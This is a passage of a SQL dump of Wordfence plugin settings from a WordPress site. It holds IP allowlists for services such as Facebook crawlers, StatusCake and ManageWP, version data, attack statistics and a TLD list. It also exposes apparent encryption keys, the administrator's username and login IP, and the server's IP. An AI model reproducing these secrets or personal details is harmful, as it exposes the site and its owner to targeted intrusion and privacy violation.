7.240.192.0\\/24","129.134.0.0\\/17","204.15.20.0\\/22","69.63.176.0\\/20","69.63.176.0\\/21","69.63.184.0\\/21","66.220.144.0\\/20","69.63.176.0\\/20","2620:0:1c00::\\/40","2a03:2880::\\/32","2a03:2880:fffe::\\/48","2a03:2880:ffff::\\/48","2620:0:1cff::\\/48","2a03:2880:f000::\\/48","2a03:2880:f001::\\/48","2a03:2880:f002::\\/48","2a03:2880:f003::\\/48","2a03:2880:f004::\\/48","2a03:2880:f005::\\/48","2a03:2880:f006::\\/48","2a03:2880:f007::\\/48","2a03:2880:f008::\\/48","2a03:2880:f009::\\/48","2a03:2880:f00a::\\/48","2a03:2880:f00b::\\/48","2a03:2880:f00c::\\/48","2a03:2880:f00d::\\/48","2a03:2880:f00e::\\/48","2a03:2880:f00f::\\/48","2a03:2880:f010::\\/48","2a03:2880:f011::\\/48","2a03:2880:f012::\\/48","2a03:2880:f013::\\/48","2a03:2880:f014::\\/48","2a03:2880:f015::\\/48","2a03:2880:f016::\\/48","2a03:2880:f017::\\/48","2a03:2880:f018::\\/48","2a03:2880:f019::\\/48","2a03:2880:f01a::\\/48","2a03:2880:f01b::\\/48","2a03:2880:f01c::\\/48","2a03:2880:f01d::\\/48","2a03:2880:f01e::\\/48","2a03:2880:f01f::\\/48","2a03:2880:1000::\\/36","2a03:2880:2000::\\/36","2a03:2880:3000::\\/36","2a03:2880:4000::\\/36","2a03:2880:5000::\\/36","2a03:2880:6000::\\/36","2a03:2880:7000::\\/36","2a03:2880:f020::\\/48","2a03:2880:f021::\\/48","2a03:2880:f022::\\/48","2a03:2880:f023::\\/48","2a03:2880:f024::\\/48","2a03:2880:f025::\\/48","2a03:2880:f026::\\/48","2a03:2880:f027::\\/48","2a03:2880:f028::\\/48","2a03:2880:f029::\\/48","2a03:2880:f02b::\\/48","2a03:2880:f02c::\\/48","2a03:2880:f02d::\\/48","2a03:2880:f02e::\\/48","2a03:2880:f02f::\\/48","2a03:2880:f030::\\/48","2a03:2880:f031::\\/48","2a03:2880:f032::\\/48","2a03:2880:f033::\\/48","2a03:2880:f034::\\/48","2a03:2880:f035::\\/48","2a03:2880:f036::\\/48","2a03:2880:f037::\\/48","2a03:2880:f038::\\/48","2a03:2880:f039::\\/48","2a03:2880:f03a::\\/48","2a03:2880:f03b::\\/48","2a03:2880:f03c::\\/48","2a03:2880:f03d::\\/48","2a03:2880:f03e::\\/48","2a03:2880:f03f::\\/48","2401:db00::\\/32","2a03:2880::\\/36","2803:6080::\\/32","2a03:2880:f100::\\/48","2a03:2880:f200::\\/48","2a03:2880:f101::\\/48","2a03:2880:f201::\\/48","2a03:2880:f102::\\/48","2a03:2880:f202::\\/48","2a03:2880:f103::\\/48","2a03:2880:f203::\\/48","2a03:2880:f104::\\/48","2a03:2880:f204::\\/48","2a03:2880:f107::\\/48","2a03:2880:f207::\\/48","2a03:2880:f108::\\/48","2a03:2880:f208::\\/48","2a03:2880:f109::\\/48","2a03:2880:f209::\\/48","2a03:2880:f10a::\\/48","2a03:2880:f20a::\\/48","2a03:2880:f10b::\\/48","2a03:2880:f20b::\\/48","2a03:2880:f10d::\\/48","2a03:2880:f20d::\\/48","2a03:2880:f10e::\\/48","2a03:2880:f20e::\\/48","2a03:2880:f10f::\\/48","2a03:2880:f20f::\\/48","2a03:2880:f110::\\/48","2a03:2880:f210::\\/48","2a03:2880:f111::\\/48","2a03:2880:f211::\\/48","2a03:2880:f112::\\/48","2a03:2880:f212::\\/48","2a03:2880:f114::\\/48","2a03:2880:f214::\\/48","2a03:2880:f115::\\/48","2a03:2880:f215::\\/48","2a03:2880:f116::\\/48","2a03:2880:f216::\\/48","2a03:2880:f117::\\/48","2a03:2880:f217::\\/48","2a03:2880:f118::\\/48","2a03:2880:f218::\\/48","2a03:2880:f119::\\/48","2a03:2880:f219::\\/48","2a03:2880:f11a::\\/48","2a03:2880:f21a::\\/48","2a03:2880:f11f::\\/48","2a03:2880:f21f::\\/48","2a03:2880:f121::\\/48","2a03:2880:f221::\\/48","2a03:2880:f122::\\/48","2a03:2880:f222::\\/48","2a03:2880:f123::\\/48","2a03:2880:f223::\\/48","2a03:2880:f10c::\\/48","2a03:2880:f20c::\\/48","2a03:2880:f126::\\/48","2a03:2880:f226::\\/48","2a03:2880:f105::\\/48","2a03:2880:f205::\\/48","2a03:2880:f125::\\/48","2a03:2880:f225::\\/48","2a03:2880:f106::\\/48","2a03:2880:f206::\\/48","2a03:2880:f11b::\\/48","2a03:2880:f21b::\\/48","2a03:2880:f113::\\/48","2a03:2880:f213::\\/48","2a03:2880:f11c::\\/48","2a03:2880:f21c::\\/48","2a03:2880:f128::\\/48","2a03:2880:f228::\\/48","2a03:2880:f02a::\\/48","2a03:2880:f12a::\\/48","2a03:2880:f22a::\\/48","2a03:2880:f12f::\\/48","2a03:2880:f22f::\\/48","2a03:2880:f11d::\\/48","2a03:2880:f11e::\\/48","2a03:2880:f120::\\/48","2a03:2880:f124::\\/48","2a03:2880:f127::\\/48","2a03:2880:f129::\\/48","2a03:2880:f12b::\\/48","2a03:2880:f12c::\\/48","2a03:2880:f12d::\\/48","2a03:2880:f12e::\\/48","2a03:2880:f130::\\/48","2a03:2880:f131::\\/48","2a03:2880:f132::\\/48","2a03:2880:f133::\\/48","2a03:2880:f134::\\/48","2a03:2880:f135::\\/48","2a03:2880:f136::\\/48","2a03:2880:f137::\\/48","2a03:2880:f138::\\/48","2a03:2880:f139::\\/48","2a03:2880:f13a::\\/48","2a03:2880:f13b::\\/48","2a03:2880:f13c::\\/48","2a03:2880:f13d::\\/48","2a03:2880:f13e::\\/48","2a03:2880:f13f::\\/48","2a03:2880:f21d::\\/48","2a03:2880:f21e::\\/48","2a03:2880:f220::\\/48","2a03:2880:f224::\\/48","2a03:2880:f227::\\/48","2a03:2880:f229::\\/48","2a03:2880:f22b::\\/48","2a03:2880:f22c::\\/48","2a03:2880:f22d::\\/48","2a03:2880:f22e::\\/48","2a03:2880:f230::\\/48","2a03:2880:f231::\\/48","2a03:2880:f232::\\/48","2a03:2880:f233::\\/48","2a03:2880:f234::\\/48","2a03:2880:f235::\\/48","2a03:2880:f236::\\/48","2a03:2880:f237::\\/48","2a03:2880:f238::\\/48","2a03:2880:f239::\\/48","2a03:2880:f23a::\\/48","2a03:2880:f23b::\\/48","2a03:2880:f23c::\\/48","2a03:2880:f23d::\\/48","2a03:2880:f23e::\\/48","2a03:2880:f23f::\\/48","2a03:2880:f0ff::\\/48","2a03:2880:f1ff::\\/48","2a03:2880:f2ff::\\/48","2c0f:ef78:0003::\\/48"]},"uptimerobot":{"n":"Uptime Robot","d":true,"r":["69.162.124.224\\/28","63.143.42.240\\/28"]},"statuscake":{"n":"StatusCake","d":true,"r":["103.194.112.70","104.131.247.151","104.131.248.65","104.131.248.78","104.156.229.24","104.156.255.184","104.206.168.26","104.238.164.105","107.150.1.135","107.155.104.182","107.155.108.234","107.155.125.29","107.161.28.219","107.170.197.248","107.170.219.46","107.170.227.23","107.170.227.24","107.170.240.141","107.170.53.191","107.191.47.131","107.191.57.237","108.61.119.153","108.61.162.214","108.61.205.201","108.61.212.141","108.61.215.179","125.63.48.239","128.199.222.65","138.197.130.232","138.197.130.235","138.197.140.243","138.204.171.136","138.68.24.115","138.68.24.136","138.68.24.207","138.68.24.60","138.68.80.10","138.68.80.173","139.59.15.79","139.59.155.26","139.59.190.241","139.59.22.109","139.59.26.85","139.59.29.167","149.154.157.61","149.255.59.100","151.236.10.238","151.236.18.80","151.80.175.223","151.80.175.226","154.127.60.23","154.127.60.59","158.255.208.76","159.203.182.22","159.203.182.60","159.203.186.225","159.203.31.18","162.243.247.163","162.243.71.56","162.248.97.72","162.253.64.104","162.253.64.87","176.56.230.110","178.62.101.57","178.62.104.137","178.62.106.84","178.62.109.7","178.62.40.233","178.62.41.44","178.62.41.49","178.62.41.52","178.62.65.162","178.62.71.227","178.62.78.199","178.62.80.93","178.62.86.69","178.73.210.99","181.41.201.117","181.41.214.137","185.112.157.185","185.12.45.70","185.47.129.168","185.60.135.86","188.166.158.224","188.166.253.148","188.226.139.158","188.226.158.160","188.226.169.228","188.226.171.58","188.226.184.152","188.226.185.106","188.226.186.199","188.226.203.84","188.226.247.184","188.68.238.79","192.241.221.11","193.124.178.54","193.124.178.61","193.182.144.105","193.182.144.147","199.167.128.80","209.222.30.242","213.183.56.107","217.148.43.188","217.148.43.202","31.220.7.237","37.157.246.146","37.235.48.42","37.235.52.25","37.235.53.240","37.235.55.205","37.97.188.103","45.32.128.80","45.32.145.79","45.32.151.21","45.32.160.172","45.32.166.195","45.32.171.24","45.32.192.198","45.32.195.186","45.32.195.93","45.32.212.56","45.32.36.158","45.32.7.22","45.63.121.159","45.63.26.78","45.63.51.63","45.63.61.213","45.63.76.68","45.63.78.84","45.63.86.120","45.63.88.213","45.76.1.44","45.76.192.50","45.76.3.112","46.101.0.24","46.101.110.32","46.101.110.43","46.101.110.45","46.101.20.96","46.101.238.182","46.101.238.189","46.101.240.208","46.101.27.186","46.101.61.83","46.101.74.251","5.45.179.103","50.2.139.16","82.221.95.161","91.236.116.163"]},"managewp":{"n":"ManageWP","d":false,"r":["34.211.180.66","54.70.65.107","34.210.224.7","52.41.5.108","52.35.72.129","54.191.137.17","35.162.254.253","52.11.12.231","52.11.29.70","52.11.54.161","52.24.142.159","52.25.191.255","52.27.181.126","52.34.126.117","52.34.254.47","52.35.82.99","52.36.28.80","52.38.106.97","52.39.177.152","52.41.230.148","52.41.237.12","52.42.126.166","52.43.13.71","52.43.76.224","52.88.96.110","52.89.155.51","54.148.73.118","54.186.37.105","54.187.92.57","54.191.32.65","54.191.67.23","54.191.80.119","54.191.135.209","54.191.136.176","54.191.148.85","54.191.149.8","52.26.122.21","52.24.187.29","52.89.85.107","54.186.128.167","54.191.40.136","52.24.62.11","52.88.119.122","54.191.148.225","54.191.151.18","52.89.94.121","52.25.116.116","52.88.215.225","54.186.143.184","52.88.197.180","52.27.171.126"]},"seznam":{"n":"Seznam Search Engine","d":true,"r":["77.75.74.0\\/24","77.75.76.0\\/24","77.75.77.0\\/24","77.75.78.0\\/24","77.75.79.0\\/24","2a02:598:a::78:0\\/112","2a02:598:a::79:0\\/112","2a02:598:2::0\\/96"]}}', 'yes'),
('whitelistHash', 'bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4', 'yes'),
('touppPromptNeeded', '1', 'yes'),
('touppBypassNextCheck', '0', 'yes'),
('autoUpdateAttempts', '0', 'yes'),
('previousWflogsFileList', '["template.php","config-livewaf.php","config-synced.php","attack-data.php","config-transient.php","config.php","ips.php","rules.php",".htaccess","GeoLite2-Country.mmdb"]', 'yes'),
('diagnosticsWflogsRemovalHistory', '[]', 'no'),
('encKey', '4531325173cf9809', 'yes'),
('longEncKey', 'c0b3024f496855d43ea237729131756bc29634392c955c01f3e1fab0edcc48d0', 'yes'),
('cbl_restOfSiteBlocked', '1', 'yes'),
('lastBlockAggregation', '1712728668', 'yes'),
('allowed404s6116Migration', '1', 'yes'),
('migration636_email_summary_excluded_directories', '1', 'no'),
('fileContentsGSB6315Migration', '1', 'yes'),
('config701Migration', '1', 'yes'),
('blocks702Migration', '1', 'yes'),
('scansEnabled_geoipSupport', '1', 'yes'),
('config720Migration', '1', 'yes'),
('waf_status', 'enabled', 'yes'),
('detectProxyNextCheck', '1713027183', 'no'),
('detectProxyNonce', '', 'no'),
('allScansScheduled', 'a:2:{i:0;a:2:{s:9:"timestamp";i:1712940000;s:4:"args";a:1:{i:0;i:1712940000;}}i:1;a:2:{s:9:"timestamp";i:1713199200;s:4:"args";a:1:{i:0;i:1713199200;}}}', 'yes'),
('activatingIP', '151.227.71.236', 'yes'),
('cbl_cookieVal', '6433d115be318', 'yes'),
('serverDNS', '1712721841;900;209.182.196.189', 'yes'),
('wp_home_url', 'https://www.happythinking.com', 'yes'),
('wp_site_url', 'https://www.happythinking.com', 'yes'),
('dbVersion', '10.5.24-MariaDB-log', 'yes'),
('allowMySQLi', '1', 'yes'),
('dbTest', 'a:1:{s:5:"nonce";s:64:"a1e7774c7a05e6f0105d8fcadc25837749ecc9f0c76aa3a3aa3968f2f29e77c6";}', 'no'),
('timeoffset_wf', '0', 'yes'),
('vulnerabilities_plugin', 'a:6:{i:0;a:4:{s:4:"slug";s:7:"akismet";s:11:"fromVersion";s:5:"5.3.2";s:10:"vulnerable";b:0;s:4:"link";b:0;}i:1;a:4:{s:4:"slug";s:11:"astra-hooks";s:11:"fromVersion";s:5:"1.0.2";s:10:"vulnerable";b:0;s:4:"link";b:0;}i:2;a:4:{s:4:"slug";s:9:"loginizer";s:11:"fromVersion";s:5:"1.8.4";s:10:"vulnerable";b:0;s:4:"link";b:0;}i:3;a:4:{s:4:"slug";s:9:"wordfence";s:11:"fromVersion";s:6:"7.11.5";s:10:"vulnerable";b:0;s:4:"link";b:0;}i:4;a:4:{s:4:"slug";s:14:"wp-super-cache";s:11:"fromVersion";s:6:"1.12.0";s:10:"vulnerable";b:0;s:4:"link";b:0;}i:5;a:4:{s:4:"slug";s:13:"wordpress-seo";s:11:"fromVersion";s:4:"22.4";s:10:"vulnerable";b:0;s:4:"link";b:0;}}', 'yes'),
('wordpressVersion', '6.5', 'yes'),
('wordpressPluginVersions', 'a:6:{s:7:"akismet";s:5:"5.3.2";s:11:"astra-hooks";s:5:"1.0.2";s:9:"loginizer";s:5:"1.8.4";s:9:"wordfence";s:6:"7.11.5";s:14:"wp-super-cache";s:6:"1.12.0";s:13:"wordpress-seo";s:4:"22.4";}', 'yes'),
('wordpressThemeVersions', 'a:4:{s:11:"astra-child";s:5:"1.0.0";s:5:"astra";s:6:"4.6.11";s:16:"twentytwentyfour";s:3:"1.1";s:17:"twentytwentythree";s:3:"1.4";}', 'yes'),
('totalLoginHits', '25942', 'yes'),
('totalLogins', '194', 'yes'),
('lastAdminLogin', 'a:6:{s:6:"userID";i:1;s:8:"username";s:8:"mkhrimas";s:9:"firstName";s:0:"";s:8:"lastName";s:0:"";s:4:"time";s:26:"Mon 1st April @ 08:09:24PM";s:2:"IP";s:14:"151.227.71.236";}', 'yes'),
('totalAlertsSent', '254', 'yes'),
('total503s', '6501', 'yes'),
('totalIPsBlocked', '6294', 'yes'),
('adminUserList', 'a:1:{i:1;i:1;}', 'yes'),
('totalIPsLocked', '53', 'yes'),
('vulnerabilities_theme', 'a:2:{i:0;a:5:{s:4:"slug";s:16:"twentytwentyfour";s:9:"toVersion";s:3:"1.1";s:11:"fromVersion";s:3:"1.1";s:10:"vulnerable";b:0;s:4:"link";b:0;}i:1;a:5:{s:4:"slug";s:17:"twentytwentythree";s:9:"toVersion";s:3:"1.4";s:11:"fromVersion";s:3:"1.4";s:10:"vulnerable";b:0;s:4:"link";b:0;}}', 'yes'),
('lastNotificationID', '91', 'no'),
('lastDashboardCheck', '1712693145', 'yes'),
('dashboardData', 'a:4:{s:9:"generated";i:1712690810;s:3:"tdf";a:3:{s:9:"community";i:5996;s:7:"premium";i:6037;s:9:"blacklist";i:9879;}s:10:"attackdata";a:3:{s:3:"24h";a:24:{i:0;a:2:{s:1:"t";i:1712602800;s:1:"c";i:12709438;}i:1;a:2:{s:1:"t";i:1712606400;s:1:"c";i:12655577;}i:2;a:2:{s:1:"t";i:1712610000;s:1:"c";i:12213072;}i:3;a:2:{s:1:"t";i:1712613600;s:1:"c";i:12054709;}i:4;a:2:{s:1:"t";i:1712617200;s:1:"c";i:11910153;}i:5;a:2:{s:1:"t";i:1712620800;s:1:"c";i:12987996;}i:6;a:2:{s:1:"t";i:1712624400;s:1:"c";i:13318037;}i:7;a:2:{s:1:"t";i:1712628000;s:1:"c";i:12829807;}i:8;a:2:{s:1:"t";i:1712631600;s:1:"c";i:13126559;}i:9;a:2:{s:1:"t";i:1712635200;s:1:"c";i:14611038;}i:10;a:2:{s:1:"t";i:1712638800;s:1:"c";i:15399117;}i:11;a:2:{s:1:"t";i:1712642400;s:1:"c";i:15669213;}i:12;a:2:{s:1:"t";i:1712646000;s:1:"c";i:14973312;}i:13;a:2:{s:1:"t";i:1712649600;s:1:"c";i:14378521;}i:14;a:2:{s:1:"t";i:1712653200;s:1:"c";i:13751553;}i:15;a:2:{s:1:"t";i:1712656800;s:1:"c";i:13860666;}i:16;a:2:{s:1:"t";i:1712660400;s:1:"c";i:14218245;}i:17;a:2:{s:1:"t";i:1712664000;s:1:"c";i:12336555;}i:18;a:2:{s:1:"t";i:1712667600;s:1:"c";i:9697672;}i:19;a:2:{s:1:"t";i:1712671200;s:1:"c";i:7038794;}i:20;a:2:{s:1:"t";i:1712674800;s:1:"c";i:8507026;}i:21;a:2:{s:1:"t";i:1712678400;s:1:"c";i:8319048;}i:22;a:2:{s:1:"t";i:1712682000;s:1:"c";i:8675037;}i:23;a:2:{s:1:"t";i:1712685600;s:1:"c";i:8266310;}}s:2:"7d";a:7:{i:0;a:2:{s:1:"t";i:1712016000;s:1:"c";i:258090103;}i:1;a:2:{s:1:"t";i:1712102400;s:1:"c";i:325384003;}i:2;a:2:{s:1:"t";i:1712188800;s:1:"c";i:298690355;}i:3;a:2:{s:1:"t";i:1712275200;s:1:"c";i:244165165;}i:4;a:2:{s:1:"t";i:1712361600;s:1:"c";i:290110183;}i:5;a:2:{s:1:"t";i:1712448000;s:1:"c";i:295607221;}i:6;a:2:{s:1:"t";i:1712534400;s:1:"c";i:303206994;}}s:3:"30d";a:30:{i:0;a:2:{s:1:"t";i:1710028800;s:1:"c";i:349964945;}i:1;a:2:{s:1:"t";i:1710115200;s:1:"c";i:334905990;}i:2;a:2:{s:1:"t";i:1710201600;s:1:"c";i:283393913;}i:3;a:2:{s:1:"t";i:1710288000;s:1:"c";i:302029089;}i:4;a:2:{s:1:"t";i:1710374400;s:1:"c";i:301717856;}i:5;a:2:{s:1:"t";i:1710460800;s:1:"c";i:299236007;}i:6;a:2:{s:1:"t";i:1710547200;s:1:"c";i:366150836;}i:7;a:2:{s:1:"t";i:1710633600;s:1:"c";i:312459354;}i:8;a:2:{s:1:"t";i:1710720000;s:1:"c";i:311140413;}i:9;a:2:{s:1:"t";i:1710806400;s:1:"c";i:314703065;}i:10;a:2:{s:1:"t";i:1710892800;s:1:"c";i:287744971;}i:11;a:2:{s:1:"t";i:1710979200;s:1:"c";i:293022267;}i:12;a:2:{s:1:"t";i:1711065600;s:1:"c";i:315090586;}i:13;a:2:{s:1:"t";i:1711152000;s:1:"c";i:320098388;}i:14;a:2:{s:1:"t";i:1711238400;s:1:"c";i:329377087;}i:15;a:2:{s:1:"t";i:1711324800;s:1:"c";i:325317018;}i:16;a:2:{s:1:"t";i:1711411200;s:1:"c";i:313282928;}i:17;a:2:{s:1:"t";i:1711497600;s:1:"c";i:281749693;}i:18;a:2:{s:1:"t";i:1711584000;s:1:"c";i:316752616;}i:19;a:2:{s:1:"t";i:1711670400;s:1:"c";i:329378503;}i:20;a:2:{s:1:"t";i:1711756800;s:1:"c";i:303064898;}i:21;a:2:{s:1:"t";i:1711843200;s:1:"c";i:309901372;}i:22;a:2:{s:1:"t";i:1711929600;s:1:"c";i:321135513;}i:23;a:2:{s:1:"t";i:1712016000;s:1:"c";i:258090103;}i:24;a:2:{s:1:"t";i:1712102400;s:1:"c";i:325384003;}i:25;a:2:{s:1:"t";i:1712188800;s:1:"c";i:298690355;}i:26;a:2:{s:1:"t";i:1712275200;s:1:"c";i:244165165;}i:27;a:2:{s:1:"t";i:1712361600;s:1:"c";i:290110183;}i:28;a:2:{s:1:"t";i:1712448000;s:1:"c";i:295607221;}i:29;a:2:{s:1:"t";i:1712534400;s:1:"c";i:303206994;}}}s:9:"countries";a:1:{s:2:"7d";a:10:{i:0;a:2:{s:2:"cd";s:2:"US";s:2:"ct";i:655558740;}i:1;a:2:{s:2:"cd";s:2:"NL";s:2:"ct";i:256383773;}i:2;a:2:{s:2:"cd";s:2:"SG";s:2:"ct";i:195700798;}i:3;a:2:{s:2:"cd";s:2:"DE";s:2:"ct";i:181988571;}i:4;a:2:{s:2:"cd";s:2:"FR";s:2:"ct";i:134236718;}i:5;a:2:{s:2:"cd";s:2:"IN";s:2:"ct";i:105469595;}i:6;a:2:{s:2:"cd";s:2:"GB";s:2:"ct";i:84302639;}i:7;a:2:{s:2:"cd";s:2:"CN";s:2:"ct";i:74584482;}i:8;a:2:{s:2:"cd";s:2:"VN";s:2:"ct";i:57802075;}i:9;a:2:{s:2:"cd";s:2:"ID";s:2:"ct";i:40998216;}}}}', 'yes'),
('tldlist', '|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|ceo|cfa|cfd|cpa|crs|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|scb|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|aero|adult|aetna|akdn|ally|arab|army|actor|amex|arpa|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|book|buzz|cafe|call|camp|care|cars|casa|case|baidu|cash|cbre|cern|chat|bosch|build|citi|city|club|cool|coop|cyou|data|date|dclk|deal|dell|desi|diet|dish|docs|dvag|land|lego|lgbt|lidl|life|autos|like|love|ltda|luxe|meet|meme|mobi|moda|azure|limo|live|maif|mini|mint|canon|link|cards|loan|menu|moto|name|navy|news|next|nico|nike|ollo|open|page|pars|pccw|pics|ping|pink|play|plus|qpon|read|beats|bible|pohl|porn|post|prod|prof|reit|rent|rest|rich|room|rsvp|ruhr|safe|sale|sarl|save|saxo|scot|bingo|black|seat|seek|sexy|shaw|shia|shop|silk|sina|site|boats|show|skin|tech|earth|sncf|sohu|song|sony|spot|star|surf|talk|taxi|team|teva|tiaa|tips|town|toys|archi|tube|vana|vote|drive|dubai|visa|viva|vivo|voto|apple|edeka|weir|wien|wiki|amfam|amica|wang|wine|work|delta|zara|cheap|cisco|citic|click|yoga|cloud|coach|xbox|zero|audio|chase|codes|crown|cymru|dabur|dance|deals|zone|email|erni|fire|epson|rodeo|rugby|salon|sener|seven|sharp|shell|shoes|careers|fage|lamer|prime|rocks|skype|sling|smart|smile|solar|space|sport|casino|ricoh|chintai|fido|film|center|chanel|chrome|church|charity|circle|fedex|channel|citadel|claims|clinic|comsec|condos|credit|cruise|dating|datsun|clubmed|coffee|college|final|cologne|fast|company|catering|cooking|country|catholic|corsica|promo|christmas|cipriani|cleaning|contact|clinique|clothing|consulting|construction|contractors|coupon|commbank|compare|computer|community|dealer|fail|degree|coupons|dental|design|farm|direct|doctor|fans|dupont|emerck|energy|faith|dunlop|durban|estate|events|expert|family|maison|quebec|courses|quest|racing|radio|rehab|reise|realty|reisen|repair|report|review|rogers|ryukyu|safety|sakura|sanofi|school|schule|search|creditcard|creditunion|secure|select|shouji|soccer|social|stada|abbott|abbvie|africa|agency|airbus|airtel|alipay|alsace|alstom|amazon|career|auction|author|audible|amsterdam|video|viajes|viking|villas|attorney|vodka|volvo|aramco|athleta|auspost|virgin|academy|allstate|allfinanz|vision|alibaba|walter|agakhan|airforce|banamex|abudhabi|accenture|barclays|voting|voyage|abogado|wales|analytics|aquarelle|americanexpress|barclaycard|weber|accountant|accountants|vegas|weibo|barcelona|watch|works|americanfamily|android|world|xerox|anquan|xihuan|yachts|yahoo|yandex|apartments|associates|webcam|zappos|barefoot|bargains|sucks|bostik|broker|store|study|style|boston|stream|studio|supply|suzuki|swatch|brussels|builders|swiss|business|tires|today|bayern|beauty|sydney|tirol|camera|total|tours|berlin|bharti|capital|taipei|toray|capitalone|taobao|caravan|target|tatar|tattoo|capetown|tmall|calvinklein|tokyo|tools|tennis|toyota|baseball|basketball|bauhaus|bentley|bnpparibas|tjmaxx|bestbuy|tkmaxx|unicom|blackfriday|blockbuster|bloomberg|ubank|boehringer|booking|brother|tunes|tushu|boutique|bradesco|bridgestone|broadway|trade|trust|tienda|travel|cricket|game|gbiz|garden|gent|ggee|gallo|gift|games|gifts|ieee|glass|imdb|gives|immo|globo|goog|gmail|gmbh|gold|golf|info|green|gripe|icbc|itau|group|gucci|guru|futbol|gallup|guge|hair|haus|hdfc|help|here|homes|host|java|honda|horse|hsbc|jaguar|jeep|guide|hyatt|ikano|jetzt|jobs|house|mango|joburg|jprs|irish|juegos|madrid|delivery|lotto|deloitte|makeup|democrat|luxury|media|george|cruises|hughes|money|giving|global|google|gratis|health|hermes|hiphop|hockey|hotels|imamat|miami|praxi|insure|intuit|market|mattel|mobile|monash|mormon|press|dentist|food|express|fashion|fish|fitness|flir|flickr|farmers|flights|ford|exposed|florist|fund|forum|free|kyoto|fishing|forex|genting|godaddy|feedback|flowers|forsale|grocery|hyundai|download|exchange|graphics|kpmg|goodyear|guitars|football|grainger|infiniti|institute|kred|lease|legal|lefrak|leclerc|lexus|lotte|digital|finance|gallery|hamburg|hangout|hitachi|discount|discover|domains|engineer|fujitsu|frontier|holdings|holiday|homesense|lanxess|lasalle|latino|ferrari|ferrero|hosting|ericsson|fidelity|frogans|hdfcbank|helsinki|hotmail|lawyer|firmdale|yamaxun|hospital|lacaixa|diamonds|latrobe|monster|toshiba|trading|youtube|zuerich|insurance|kaufen|kosher|immobilien|ipiranga|lilly|ismaili|kddi|investments|istanbul|kiwi|koeln|jewelry|jpmorgan|juniper|kerryhotels|lamborghini|kerrylogistics|kerryproperties|kids|landrover|lipsy|loans|kindle|lifeinsurance|locus|kitchen|lighting|limited|living|lincoln|industries|locker|komatsu|london|lplfinancial|walmart|wanggou|marriott|watches|weather|lundbeck|markets|mckinsey|website|marketing|wedding|international|kuokgroup|lifestyle|melbourne|memorial|moscow|whoswho|management|windows|marshalls|winners|merckmsd|directory|fairwinds|homegoods|lancaster|phone|philips|photo|pizza|photos|physio|pictet|pioneer|rentals|cuisinella|equipment|reviews|pictures|rexroth|woodside|firestone|enterprises|xn--90ae|education|financial|fresenius|engineering|eurovision|furniture|extraspace|goldpoint|richardli|xn--90ais|xn--c1avg|xn--d1alf|xn--e1a4c|xn--fhbei|xn--j1aef|xn--j1amh|xn--l1acc|xn--ngbrx|foundation|place|mortgage|plumbing|poker|politie|property|recipes|redstone|reliance|xn--node|microsoft|mitsubishi|realtor|republican|restaurant|xn--30rr7y|yokohama|yodobashi|healthcare|hisamitsu|homedepot|pramerica|properties|protection|prudential|realestate|xn--3pxu8k|xn--45q11c|xn--4gbrim|xn--nqv7f|xn--5tzm5g|xn--c2br7g|xn--p1acf|xn--p1ai|xn--qxa6a|xn--80aswg|xn--90a3ac|xn--qxam|xn--55qx5d|xn--9dbq2a|xn--9et52u|xn--cg4bki|xn--czrs0t|xn--tckwe|xn--czru2d|xn--unup4y|xn--vhquv|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--io0a7i|xn--kput3i|xn--mxtq1m|xn--o3cw4h|xn--pssy2u|xn--q7ce6a|xn--wgbh1c|xn--wgbl6a|xn--y9a3aq|motorcycles|movie|music|nexus|nowtv|omega|osaka|paris|parts|party|museum|nikon|nokia|nagoya|natura|norton|nowruz|online|oracle|pfizer|netbank|netflix|otsuka|network|ninja|nissan|nissay|office|observer|nextdirect|olayan|okinawa|singles|support|olayangroup|orange|neustar|organic|origins|shiksha|staples|storage|systems|partners|surgery|pharmacy|security|softbank|statefarm|schaeffler|sc